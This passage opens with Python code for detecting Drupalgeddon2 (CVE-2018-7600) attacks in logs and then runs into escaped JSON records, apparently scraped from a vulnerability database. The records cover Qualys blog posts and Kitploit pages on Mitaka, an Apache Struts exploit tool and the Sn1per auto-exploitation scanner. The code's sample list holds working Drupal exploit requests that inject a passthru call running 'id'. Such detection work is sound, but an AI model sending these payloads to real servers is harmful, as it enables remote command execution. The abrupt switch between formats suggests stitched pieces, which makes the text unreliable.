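    """Drupal 7 ships CHANGELOG.txt whose first release line reads 'Drupal 7.57, 2018-02-21'
    (ASSUMPTION: that leading-line format). Returns the version string or None."""
    match = re.search(r"^Drupal (\d+(?:\.\d+)+)", changelog_text, re.M)
    return match.group(1) if match else None


def is_vulnerable_version(version):
    """True/False against FIXED; None for a major this page gives no fixed release for
    (Drupal 6 is handled through its long-term support vendors, per the FAQ)."""
    parts = tuple(int(x) for x in version.split("."))
    fixed = FIXED.get(parts[0])
    if fixed is None:
        return None
    return parts < fixed


# Constructed request lines: (target, body). The first three mirror the module above.
SAMPLE_REQUESTS = [
    ("/?q=user%2Fpassword&name%5B%23post_render%5D%5B%5D=passthru&name%5B%23markup%5D=id&name%5B%23type%5D=markup",
     "form_id=user_pass&_triggering_element_name=name"),
    ("/?q=file%2Fajax%2Fname%2F%23value%2Fform-abc123", "form_build_id=form-abc123"),
    ("/user/register?element_parents=account%2Fmail%2F%23value&ajax_form=1&_wrapper_format=drupal_ajax",
     "form_id=user_register_form&_drupal_ajax=1&mail%5B%23type%5D=markup&mail%5B%23post_render%5D%5B%5D=passthru&mail%5B%23markup%5D=id"),
    ("/user/register", ""),                                 # ordinary registration page
    ("/?q=user/password", "form_id=user_pass&name=alice"),  # legitimate password reset
]

SAMPLE_CHANGELOG = """Drupal 7.57, 2018-02-21
-----------------------
- (constructed sample; release notes omitted)

Drupal 7.56, 2017-06-21
-----------------------
"""

if __name__ == "__main__":
    for target, body in SAMPLE_REQUESTS:
        print(is_drupalgeddon2_request(target, body) or "ok", "<-", target)
    found = version_from_changelog(SAMPLE_CHANGELOG)
    print(found, "vulnerable" if is_vulnerable_version(found) else "patched")
```

The request check is useful even without POST bodies: the Drupal 8 exploit puts `element_parents` in the query string and the Drupal 7 exploit puts the `name[#post_render][]` field there too, so both show up in an ordinary access log. A version below the fixed release plus any such request in the logs should be treated as a compromise until proven otherwise, not just a patching item.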
\n\n\u201cSimply open WAS and go to Detections. In the search field, enter \"150183\" (this is the WAS QID reported when Drupal CMS is detected). If WAS has identified any web apps running Drupal, you will see QID 150183 listed in the detections. Open each detection and look at the Results section to see the version of Drupal running on that site. If necessary, start the patching process,\u201d Ferguson wrote.\n\n### In other infosec news \u2026\n\n * The city government of Atlanta, which recently suffered a serious [ransomware attack](<https://www.csoonline.com/article/3264654/security/atlanta-officials-still-working-around-the-clock-to-resolve-ransomware-attack.html>) that disrupted operations, was warned months ago that its IT systems were riddled with \u201csevere and critical vulnerabilities\u201d that put them in serious danger of cyber attacks, [according to CBS46](<http://www.cbs46.com/story/37821878/internal-audit-shows-city-knew-of-it-vulnerabilities>), the local CBS affiliate. \n * Hackers breached a Baltimore city government server, impacting the city\u2019s 911 system, as [reported](<http://www.baltimoresun.com/news/maryland/crime/bs-md-ci-911-hacked-20180327-story.html>) by The Baltimore Sun.\n * Cryptocurrency Monero may not be as private as previously thought, according to a [research report](<https://arxiv.org/pdf/1704.04299.pdf>) published last week. 
Sophos\u2019 Naked Security blog has a [take](<https://nakedsecurity.sophos.com/2018/03/28/unmasking-monero-stripping-the-currencys-privacy-protection/>) on the research, as does [Wired](<https://www.wired.com/story/monero-privacy/>), while Coindesk [dismisses](<https://www.coindesk.com/broken-privacy-the-allegations-against-monero-are-old-news/>) the findings as \u201cold news.\u201d", "cvss3": {}, "published": "2018-04-02T18:02:51", "type": "qualysblog", "title": "Microsoft Misfires with Meltdown Patch, while WannaCry Pops Up at Boeing", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2018-1038", "CVE-2018-7600"], "modified": "2018-04-02T18:02:51", "id": "QUALYSBLOG:D57DEDE8164E21BF8EE0C81B50AAA328", "href": "https://blog.qualys.com/news/2018/04/02/microsoft-misfires-with-meltdown-patch-while-wannacry-pops-up-at-boeing", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-12-27T19:32:53", "description": "[A recent report](<https://www.darkreading.com/threat-intelligence/20-vulnerabilities-to-prioritize-patching-before-2020/d/d-id/1336691>) identified 19+ vulnerabilities that should be mitigated by the end of 2019. These are top vulnerabilities attacked and leveraged by Advanced Persistent Threat (APT) actors from all parts of the world.\n\nThe list below shows those top 19 vulnerabilities, and it should be no surprise that you can easily track and remediate them via a dashboard within Qualys. 
Import the dashboard into your subscription for easy insight into what assets and vulnerabilities in your organization are at risk.\n\n**No.** | **CVE** | **Products Affected by CVE** | **CVSS Score (NVD)** | **Examples of Threat Actors** \n---|---|---|---|--- \n**1** | CVE-2017-11882 | Microsoft Office | 7.8 | APT32 (Vietnam), APT34 (Iran), APT40 (China), APT-C-35 (India), Cobalt Group (Spain, Ukraine), Silent Group (Russia), Lotus Blossom (China), FIN7 (Russia) \n**2** | CVE-2018-8174 | Microsoft Windows | 7.5 | Silent Group (Russia), Dark Hotel APT (North Korea) \n**3** | CVE-2017-0199 | Microsoft Office, Windows | 7.8 | APT34 (Iran), APT40 (China), APT-C-35 (India), Cobalt Group (Spain, Ukraine), APT37 (North Korea), Silent Group (Russia), Gorgon Group (Pakistan), Gaza Cybergang (Iran) \n**4** | CVE-2018-4878 | Adobe Flash Player, Red Hat Enterprise Linux | 9.8 | APT37 (North Korea), Lazarus Group (North Korea) \n**5** | CVE-2017-10271 | Oracle WebLogic Server | 7.5 | Rocke Gang (Chinese Cybercrime) \n**6** | CVE-2019-0708 | Microsoft Windows | 9.8 | Kelvin SecTeam (Venezuela, Colombia, Peru) \n**7** | CVE-2017-5638 | Apache Struts | 10 | Lazarus Group (North Korea) \n**8** | CVE-2017-5715 | ARM, Intel | 5.6 | Unknown \n**9** | CVE-2017-8759 | Microsoft .net Framework | 7.8 | APT40 (China), Cobalt Group (Spain, Ukraine), APT10 (China) \n**10** | CVE-2018-20250 | RARLAB WinRAR | 7.8 | APT32 (Vietnam), APT33 (Iran), APT-C-27 (Iran), Lazarus Group (North Korea), MuddyWater APT (Iran) \n**11** | CVE-2018-7600 | Debian, Drupal | 9.8 | Kelvin SecTeam (Venezuela, Colombia, Peru), Sea Turtle (Iran) \n**12** | CVE-2018-10561 | DASAN Networks | 9.8 | Kelvin SecTeam (Venezuela, Colombia, Peru) \n**13** | CVE-2012-0158 | Microsoft | N/A; 9.3* | APT28 (Russia), APT-C-35 (India), Cobalt Group (Spain, Ukraine), Lotus Blossom (China), Goblin Panda (China), Gorgon Group (Pakistan), APT40 (China) \n**14** | CVE-2017-8570 | Microsoft Office | 7.8 | APT-C-35 (India), Cobalt Group 
(Spain, Ukraine), APT23 (China) \n**15** | CVE-2018-0802 | Microsoft Office | 7.8 | Cobalt Group (Spain, Ukraine), APT37 (North Korea), Silent Group (Russia), Cloud Atlas (Unknown), Cobalt Group (Spain, Ukraine), Goblin Panda (China), APT23 (China), APT27 (China), Rancor Group (China), Temp.Trident (China) \n**16** | CVE-2017-0143 | Microsoft SMB | 8.1 | APT3 (China), Calypso (China) \n**17** | CVE-2018-12130 | Fedora | 5.6 | Iron Tiger (China), APT3 (China), Calypso (China) \n**18** | CVE-2019-2725 | Oracle WebLogic Server | 9.8 | Panda (China) \n**19** | CVE-2019-3396 | Atlassian Confluence | 9.8 | APT41 (China), Rocke Gang (Chinese Cybercrime) \n \n* according to [cvedetails.com](<http://cvedetails.com/>)\n\n### Detecting the Top 19 CVEs\n\nQualys has detections (QIDs) for [Qualys Vulnerability Management](<https://www.qualys.com/apps/vulnerability-management/>) that cover authenticated and remotely detected vulnerabilities supported by Qualys scanners and [Qualys Cloud Agent](<https://www.qualys.com/cloud-agent/>).\n\nTo return a list of all impacted hosts, use the following QQL query within the VM Dashboard:\n \n \n vulnerabilities.vulnerability.cveIds:[CVE-2017-11882, CVE-2018-8174, CVE-2017-0199, CVE-2018-4878, CVE-2017-10271, CVE-2019-0708, CVE-2017-5638, CVE-2017-5715, CVE-2017-8759, CVE-2018-20250, CVE-2018-7600, CVE-2018-10561, CVE-2012-0158, CVE-2017-8570, CVE-2018-0802, CVE-2017-0143, CVE-2018-12130, CVE-2019-2725, CVE-2019-3396]\n\nYou can [import the following dashboard to track all 19 CVEs](<https://discussions.qualys.com/docs/DOC-7032>) as shown in the template below:\n\n[](<https://discussions.qualys.com/docs/DOC-7032>)\n\n### Alerts\n\nThe Qualys Cloud Platform enables you to continuously monitor for vulnerabilities and misconfigurations and get alerted for your most critical assets.\n\nSee how to set up [notifications for new and updated QIDs](<https://www.qualys.com/docs/version/8.21/qualys-vulnerability-notification.pdf>).\n\n### Tracking 
Per-Year Environment Impact and Remediation\n\nThe Qualys visualization team has included a Per-Year Environment Insight View Dashboard for easy tracking and remediation. This dashboard has been included in release 2.42 and can be found within the dashboard templates library. It will automatically show your systems whether scanned internally, externally or on remote mobile computers with the groundbreaking Qualys Cloud Agent.\n\n\n\nThis Per-Year Environment Insight View Dashboard will display data per year based on First Found date, followed by Vulnerability Status, Severity, Compliance, Real-Time Threat Intelligence (RTI)s from [Qualys Threat Protection](<https://www.qualys.com/apps/threat-protection/>), and Vulnerability Published Dates, allowing for an easy glance across your environment.\n\n\n\n \n\n### Get Started Now\n\nTo start detecting and remediating these vulnerabilities now, get a [Qualys Suite trial](<https://www.qualys.com/forms/trials/suite/>).\n\nVisit the [Qualys Community](<https://community.qualys.com/docs/DOC-6785>) to download other dashboards created by your SMEs and Product Management team and import them into your subscription for further data insights.", "cvss3": {}, "published": "2019-12-27T18:01:22", "type": "qualysblog", "title": "Top 19+ Vulnerability CVEs in Santa\u2019s Dashboard Tracking", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2012-0158", "CVE-2017-0143", "CVE-2017-0199", "CVE-2017-10271", "CVE-2017-11882", "CVE-2017-5638", "CVE-2017-5715", "CVE-2017-8570", "CVE-2017-8759", "CVE-2018-0802", "CVE-2018-10561", "CVE-2018-12130", "CVE-2018-20250", "CVE-2018-4878", "CVE-2018-7600", "CVE-2018-8174", "CVE-2019-0708", "CVE-2019-2725", "CVE-2019-3396"], "modified": "2019-12-27T18:01:22", "id": "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4", "href": "https://blog.qualys.com/technology/2019/12/27/top-19-vulnerability-cves-in-santas-dashboard-tracking", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], 
"kitploit": [{"lastseen": "2023-06-19T15:27:47", "description": "[](<https://1.bp.blogspot.com/-9cslz9huO_U/XYAeBJbmtNI/AAAAAAAAQXo/vfBLw3xqV-stKkRe0MzCd4fOhcbHSMVCwCNcBGAsYHQ/s1600/mitaka_8_eyecatch.png>)\n\n \nMitaka is a browser extension for [OSINT](<https://www.kitploit.com/search/label/OSINT> \"OSINT\" ) search which can: \n\n\n * Extract & refang IoC from a selected block of text. \n * E.g. `example[.]com` to `example.com`, `test[at]example.com` to `some-email@example.com`, `hxxp://example.com` to `http://example.com`, etc.\n * Search / scan it on various engines. \n * E.g. VirusTotal, urlscan.io, Censys, Shodan, etc.\n \n**Features** \n \n**Supported IOC types** \nname | desc. | e.g. \n---|---|--- \ntext | Freetext | any string(s) \nip | IPv4 address | `8.8.8.8` \ndomain | Domain name | `github.com` \nurl | URL | `https://github.com` \nemail | Email address | `some-email@example.com` \nasn | ASN | `AS13335` \nhash | md5 / sha1 / sha256 | `44d88612fea8a8f36de82e1278abb02f` \ncve | CVE number | `CVE-2018-11776` \nbtc | BTC address | `1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa` \ngaPubID | Google Adsense Publisher ID | `pub-9383614236930773` \ngaTrackID | Google [Analytics](<https://www.kitploit.com/search/label/Analytics> \"Analytics\" ) Tracker ID | `UA-67609351-1` \n \n**Supported search engines** \nname | url | supported types \n---|---|--- \nAbuseIPDB | [https://www.abuseipdb.com](<https://www.abuseipdb.com/> \"https://www.abuseipdb.com\" ) | ip \narchive.org | [https://archive.org](<https://archive.org/> \"https://archive.org\" ) | url \narchive.today | [http://archive.fo](<http://archive.fo/> \"http://archive.fo\" ) | url \nBGPView | [https://bgpview.io](<https://bgpview.io/> \"https://bgpview.io\" ) | ip / asn \nBinaryEdge | [https://app.binaryedge.io](<https://app.binaryedge.io/> \"https://app.binaryedge.io\" ) | ip / domain \nBitcoinAbuse | [https://www.bitcoinabuse.com](<https://www.bitcoinabuse.com/> \"https://www.bitcoinabuse.com\" ) | btc 
\nBlockchain.com | [https://www.blockchain.com](<https://www.blockchain.com/> \"https://www.blockchain.com\" ) | btc \nBlockCypher | [https://live.blockcypher.com](<https://live.blockcypher.com/> \"https://live.blockcypher.com\" ) | btc \nCensys | [https://censys.io](<https://censys.io/> \"https://censys.io\" ) | ip / domain / asn / text \ncrt.sh | [https://crt.sh](<https://crt.sh/> \"https://crt.sh\" ) | domain \nDNSlytics | [https://dnslytics.com](<https://dnslytics.com/> \"https://dnslytics.com\" ) | ip / domain \nDomainBigData | [https://domainbigdata.com](<https://domainbigdata.com/> \"https://domainbigdata.com\" ) | domain \nDomainTools | [https://www.domaintools.com](<https://www.domaintools.com/> \"https://www.domaintools.com\" ) | ip / domain \nDomainWatch | [https://domainwat.ch](<https://domainwat.ch/> \"https://domainwat.ch\" ) | domain / email \nEmailRep | [https://emailrep.io](<https://emailrep.io/> \"https://emailrep.io\" ) | email \nFindSubDomains | [https://findsubdomains.com](<https://findsubdomains.com/> \"https://findsubdomains.com\" ) | domain \nFOFA | [https://fofa.so](<https://fofa.so/> \"https://fofa.so\" ) | ip / domain \nFortiGuard | [https://fortiguard.com](<https://fortiguard.com/> \"https://fortiguard.com\" ) | ip / url / cve \nGoogle Safe Browsing | [https://transparencyreport.google.com](<https://transparencyreport.google.com/> \"https://transparencyreport.google.com\" ) | domain / url \nGreyNoise | [https://viz.greynoise.io](<https://viz.greynoise.io/> \"https://viz.greynoise.io\" ) | ip / domain / asn \nHashdd | [https://hashdd.com](<https://hashdd.com/> \"https://hashdd.com\" ) | ip / domain / hash \nHybridAnalysis | [https://www.hybrid-analysis.com](<https://www.hybrid-analysis.com/> \"https://www.hybrid-analysis.com\" ) | ip / domain / hash (sha256 only) \nIntelligence X | [https://intelx.io](<https://intelx.io/> \"https://intelx.io\" ) | ip / domain / url / email / btc \nIPinfo | [https://ipinfo.io](<https://ipinfo.io/> 
\"https://ipinfo.io\" ) | ip / asn \nIPIP | [https://en.ipip.net](<https://en.ipip.net/> \"https://en.ipip.net\" ) | ip / asn \nJoe Sandbox | [https://www.joesandbox.com](<https://www.joesandbox.com/> \"https://www.joesandbox.com\" ) | hash \nMalShare | [https://malshare.com](<https://malshare.com/> \"https://malshare.com\" ) | hash \nMaltiverse | [https://www.maltiverse.com](<https://www.maltiverse.com/> \"https://www.maltiverse.com\" ) | domain / hash \nNVD | [https://nvd.nist.gov](<https://nvd.nist.gov/> \"https://nvd.nist.gov\" ) | cve \nOOCPR | [https://data.occrp.org](<https://data.occrp.org/> \"https://data.occrp.org\" ) | email \nONYPHE | [https://www.onyphe.io](<https://www.onyphe.io/> \"https://www.onyphe.io\" ) | ip \nOTX | [https://otx.alienvault.com](<https://otx.alienvault.com/> \"https://otx.alienvault.com\" ) | ip / domain / hash \nPubDB | [http://pub-db.com](<http://pub-db.com/> \"http://pub-db.com\" ) | gaPubID / gaTrackID \nPublicWWW | [https://publicwww.com](<https://publicwww.com/> \"https://publicwww.com\" ) | text \nPulsedive | [https://pulsedive.com](<https://pulsedive.com/> \"https://pulsedive.com\" ) | ip / domaion / url / hash \nRiskIQ | [http://community.riskiq.com](<http://community.riskiq.com/> \"http://community.riskiq.com\" ) | ip / domain / email / gaTrackID \nSecurityTrails | [https://securitytrails.com](<https://securitytrails.com/> \"https://securitytrails.com\" ) | ip / domain / email \nShodan | [https://www.shodan.io](<https://www.shodan.io/> \"https://www.shodan.io\" ) | ip / domain / asn \nSploitus | [https://sploitus.com](<https://sploitus.com/> \"https://sploitus.com\" ) | cve \nSpyOnWeb | [http://spyonweb.com](<http://spyonweb.com/> \"http://spyonweb.com\" ) | ip / domain / gaPubID / gaTrackID \nTalos | [https://talosintelligence.com](<https://talosintelligence.com/> \"https://talosintelligence.com\" ) | ip / domain \nThreatConnect | [https://app.threatconnect.com](<https://app.threatconnect.com/> 
\"https://app.threatconnect.com\" ) | ip / domain / email \nThreatCrowd | [https://www.threatcrowd.org](<https://www.threatcrowd.org/> \"https://www.threatcrowd.org\" ) | ip / domain / email \nThreatMiner | [https://www.threatminer.org](<https://www.threatminer.org/> \"https://www.threatminer.org\" ) | ip / domain / hash \nTIP | [https://threatintelligenceplatform.com](<https://threatintelligenceplatform.com/> \"https://threatintelligenceplatform.com\" ) | ip / domain \nUrlscan | [https://urlscan.io](<https://urlscan.io/> \"https://urlscan.io\" ) | ip / domain / asn / url \nViewDNS | [https://viewdns.info](<https://viewdns.info/> \"https://viewdns.info\" ) | ip / domain / email \nVirusTotal | [https://www.virustotal.com](<https://www.virustotal.com/> \"https://www.virustotal.com\" ) | ip / domain / url / hash \nVulmon | [https://vulmon.com](<https://vulmon.com/> \"https://vulmon.com\" ) | cve \nVulncodeDB | [https://www.vulncode-db.com](<https://www.vulncode-db.com/> \"https://www.vulncode-db.com\" ) | cve \nVxCube | [http://vxcube.com](<http://vxcube.com/> \"http://vxcube.com\" ) | ip / domain / hash \nWebAnalyzer | [https://wa-com.com](<https://wa-com.com/> \"https://wa-com.com\" ) | domain \nWe Leak Info | [https://weleakinfo.com](<https://weleakinfo.com/> \"https://weleakinfo.com\" ) | email \nX-Force Exchange | [https://exchange.xforce.ibmcloud.com](<https://exchange.xforce.ibmcloud.com/> \"https://exchange.xforce.ibmcloud.com\" ) | ip / domain / hash \nZoomEye | [https://www.zoomeye.org](<https://www.zoomeye.org/> \"https://www.zoomeye.org\" ) | ip \n \n**Supported scan engines** \nname | url | supported types \n---|---|--- \nUrlscan | [https://urlscan.io](<https://urlscan.io/> \"https://urlscan.io\" ) | ip / domain / url \nVirusTotal | [https://www.virustotal.com](<https://www.virustotal.com/> \"https://www.virustotal.com\" ) | url \n \n**Downloads** \n\n\n * Chrome: <https://chrome.google.com/webstore/detail/mitaka/bfjbejmeoibbdpfdbmbacmefcbannnbg>\n * 
FireFox: <https://addons.mozilla.org/en-US/firefox/addon/mitaka/>\n \n**How to use** \nThis browser extension shows context menus based on the type of IoC you selected, and then you can choose what you want to search / scan on. \n \n**Examples:** \n \n\n\n[](<https://1.bp.blogspot.com/-2tdM6fuXGfQ/XYAeOc1TdNI/AAAAAAAAQXs/o9Yh-_pJEdwOcF-5KM-3Hj9CjQSlHLl5wCNcBGAsYHQ/s1600/mitaka_9_1.gif>)\n\n \n\n\n[](<https://1.bp.blogspot.com/-4t9b6shG_iQ/XYAeOVytJkI/AAAAAAAAQXw/b4P4PJz5gU0lDqmKpJ9dL3jhiUVXkhOxwCNcBGAsYHQ/s1600/mitaka_10_2.gif>)\n\n \n**Note:** \nPlease set your urlscan.io & [VirusTotal](<https://www.kitploit.com/search/label/VirusTotal> \"VirusTotal\" ) API keys in the options page to enable urlscan.io & VirusTotal scans. \n \n**Options** \nYou can enable / disable a search engine on the options page based on your preference. \n \n\n\n[](<https://1.bp.blogspot.com/-dP_LGUSsF1M/XYAeT14bPsI/AAAAAAAAQX0/U7gyifaFxOgCv92e0_k0fugVzaLMShGIACNcBGAsYHQ/s1600/mitaka_11_options.png>)\n\n \n**About Permissions** \nThis browser extension requires the following permissions. \n\n\n * `Read and change all your data on the websites you visit`: \n * This extension creates context menus dynamically based on what you select on a website.\n * This means the extension requires reading all your data on the websites you visit. (This extension doesn't change anything on the websites.)\n * `Display notifications`: \n * This extension shows a notification when something goes wrong.\nI don't (and will never) collect any information from the users. 
\n \n**Alternatives or Similar Tools** \n\n\n * [CrowdScrape](<https://chrome.google.com/webstore/detail/crowdscrape/jjplaeklnlddpkbbdbnogmppffokemej> \"CrowdScrape\" )\n * [Gotanda](<https://github.com/HASH1da1/Gotanda> \"Gotanda\" )\n * [Sputnik](<https://github.com/mitchmoser/sputnik> \"Sputnik\" )\n * [ThreatConnect Integrated ](<https://chrome.google.com/webstore/detail/threatconnect-integrated/lblgcphpihpadjdpjgjnnoikjdjcnkbh> \"ThreatConnect Integrated \" )[Chrome](<https://www.kitploit.com/search/label/Chrome> \"Chrome\" ) Extension\n * [ThreatPinch Lookup](<https://github.com/cloudtracer/ThreatPinchLookup> \"ThreatPinch Lookup\" )\n * [VTchromizer](<https://chrome.google.com/webstore/detail/vtchromizer/efbjojhplkelaegfbieplglfidafgoka> \"VTchromizer\" )\n \n**How to build (for developers)** \nThis browser extension is written in [TypeScript](<https://www.typescriptlang.org/> \"TypeScript\" ) and built with [webpack](<https://webpack.js.org/> \"webpack\" ). \nTypeScript files start out in the `src` directory, run through the TypeScript compiler and then webpack, and end up as JavaScript files in the `dist` directory. \n\n \n \n git clone https://github.com/ninoseki/mitaka.git\n cd mitaka\n npm install\n npm run test\n npm run build\n\nTo load an unpacked extension, please follow the procedure described at <https://developer.chrome.com/extensions/getstarted>. \n \n**Misc** \nMitaka/\u898b\u305f\u304b means \"Have you seen it?\" in Japanese. 
\n \n \n\n\n**[Download Mitaka](<https://github.com/ninoseki/mitaka> \"Download Mitaka\" )**\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-09-21T12:00:00", "type": "kitploit", "title": "Mitaka - A Browser Extension For OSINT Search", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2019-09-21T12:00:07", "id": "KITPLOIT:8708017483803645203", "href": "http://www.kitploit.com/2019/09/mitaka-browser-extension-for-osint.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-23T15:18:09", "description": " \n\n\n[](<https://3.bp.blogspot.com/-MKbYVQXvBz0/W4LReq3_cJI/AAAAAAAAMQ0/WgNhU5_o5cIwFs69p3T2YIf3xObo_rAtgCLcBGAs/s1600/Apache-Struts-v3_1_screen.png>)\n\n \nScript contains the fusion of 3 RCE vulnerabilities on ApacheStruts, it also has the ability to create server shells. 
\n \n**SHELL** \n**php** `finished` \n**jsp** `process` \n \n**CVE ADD** \n**CVE-2013-2251** `'action:', 'redirect:' and 'redirectAction'` \n**CVE-2017-5638** `Content-Type` \n**CVE-2018-11776** `'redirect:' and 'redirectAction'` \n \n \n\n\n**[Download Apache-Struts-v3](<https://github.com/s1kr10s/Apache-Struts-v3>)**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-08-26T21:14:00", "type": "kitploit", "title": "Apache Struts v3 - Tool To Exploit 3 RCE Vulnerabilities On ApacheStruts", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2251", "CVE-2017-5638", "CVE-2018-11776"], "modified": "2018-08-26T21:14:01", "id": "KITPLOIT:4611207874033525364", "href": "http://www.kitploit.com/2018/08/apache-struts-v3-tool-to-exploit-3-rce.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-07-04T12:36:49", "description": "[](<https://1.bp.blogspot.com/-Poffj1hNPBk/XNXfkZuyGfI/AAAAAAAAO0U/k4nQgdLXOoEZMOGlGb3wgnx8HgQzEtacgCLcBGAs/s1600/Sn1per_1_Sn1per.jpeg>)\n\n \n\n\nSn1per Community Edition is an [automated scanner](<https://www.kitploit.com/search/label/Automated%20scanner> 
\"automated scanner\" ) that can be used during a [penetration test](<https://www.kitploit.com/search/label/Penetration%20Test> \"penetration test\" ) to enumerate and scan for vulnerabilities. Sn1per Professional is Xero Security's premium reporting addon for Professional Penetration Testers, Bug Bounty Researchers and Corporate Security teams to manage large environments and pentest scopes. For more information regarding Sn1per Professional, go to [https://xerosecurity.com](<https://xerosecurity.com/> \"https://xerosecurity.com\" ).\n\n \n**SN1PER PROFESSIONAL FEATURES:** \n \n**Professional reporting interface** \n \n\n\n[](<https://2.bp.blogspot.com/-HnwS8O0KEik/XNXfrGJWPeI/AAAAAAAAO0Y/94Hl4CC3M_kytYKkKldzXNviz4ff92TVACLcBGAs/s1600/Sn1per_8.png>)\n\n \n**Slideshow for all gathered screenshots** \n \n\n\n[](<https://2.bp.blogspot.com/-coOpsZX0XMM/XNXfuVNicUI/AAAAAAAAO0c/Wd2EQSAcI4Uti3bkaa1kxqajpStfjTK0ACLcBGAs/s1600/Sn1per_9.png>)\n\n \n**Searchable and sortable DNS, IP and open port database** \n \n\n\n[](<https://4.bp.blogspot.com/-bfzb6vLbCks/XNXfy5vfkTI/AAAAAAAAO0g/9aO7_9YKrqMyWK3PehtfItlm4DZ6KWR4gCLcBGAs/s1600/Sn1per_10.png>)\n\n \n**Detailed host reports** \n \n\n\n[](<https://4.bp.blogspot.com/-JbxR5Z-2O_4/XNXf2YbT_DI/AAAAAAAAO0o/w8Hin6Cbf1Ue4QbVW70T2-r1Rj82wDsSQCLcBGAs/s1600/Sn1per_11.png>)\n\n \n**NMap HTML host reports** \n \n\n\n[](<https://2.bp.blogspot.com/-TYr4tFOy7Y4/XNXf7dXeSII/AAAAAAAAO0w/0YMKst5KHGoygojHG2r6tJxqkg2a-w1YQCLcBGAs/s1600/Sn1per_12.png>)\n\n \n**Quick links to online recon tools and Google hacking queries** \n \n\n\n[](<https://1.bp.blogspot.com/-FNe1YF5mg68/XNXgAPQOAEI/AAAAAAAAO00/5uuuQo2KqRgwpTE11Z-U6p_XGetjCf9vgCLcBGAs/s1600/Sn1per_13.png>)\n\n \n**Takeovers and Email Security** \n \n\n\n[](<https://2.bp.blogspot.com/-FNah2OwM_nU/XNXgEeJZG9I/AAAAAAAAO08/A7lu1554nJ0GpEOj7AtdZ_emSoyq5lBxQCLcBGAs/s1600/Sn1per_14.png>)\n\n \n**HTML5 Notepad** \n 
\n\n\n[](<https://2.bp.blogspot.com/-DHOnECOz-T0/XNXgH_QX4JI/AAAAAAAAO1E/s0bFVC-Uf_87tBFY2AJwiJyHgKJ8VgKXQCLcBGAs/s1600/Sn1per_15.png>)\n\n \n**ORDER SN1PER PROFESSIONAL:** \nTo obtain a Sn1per Professional license, go to [https://xerosecurity.com](<https://xerosecurity.com/> \"https://xerosecurity.com\" ). \n \n**DEMO VIDEO:** \n \n \n\n\n[](<https://asciinema.org/a/IDckE48BNSWQ8TV8yEjJjjMNm>)\n\n \n \n**SN1PER COMMUNITY FEATURES:** \n\n\n * Automatically collects basic recon (i.e. whois, ping, DNS, etc.)\n * Automatically launches Google hacking queries against a target domain\n * Automatically enumerates open ports via NMap port scanning\n * Automatically brute forces sub-domains, gathers DNS info and checks for zone transfers\n * Automatically checks for sub-domain hijacking\n * Automatically runs targeted NMap scripts against open ports\n * Automatically runs targeted Metasploit scan and exploit modules\n * Automatically scans all web applications for common vulnerabilities\n * Automatically brute forces ALL open services\n * Automatically tests for anonymous FTP access\n * Automatically runs WPScan, Arachni and Nikto for all web services\n * Automatically enumerates NFS shares\n * Automatically tests for anonymous LDAP access\n * Automatically enumerates SSL/TLS ciphers, protocols and vulnerabilities\n * Automatically enumerates SNMP community strings, services and users\n * Automatically lists SMB users and shares, checks for NULL sessions and exploits MS08-067\n * Automatically exploits vulnerable JBoss, Java RMI and Tomcat servers\n * Automatically tests for open X11 servers\n * Auto-pwn added for Metasploitable, ShellShock, MS08-067, Default Tomcat Creds\n * Performs high level enumeration of multiple hosts and subnets\n * Automatically integrates with Metasploit Pro, MSFConsole and Zenmap for reporting\n * Automatically gathers screenshots of all web sites\n * Creates individual workspaces to store all scan output\n \n**EXPLOITS:** \n\n\n * Drupal RESTful Web 
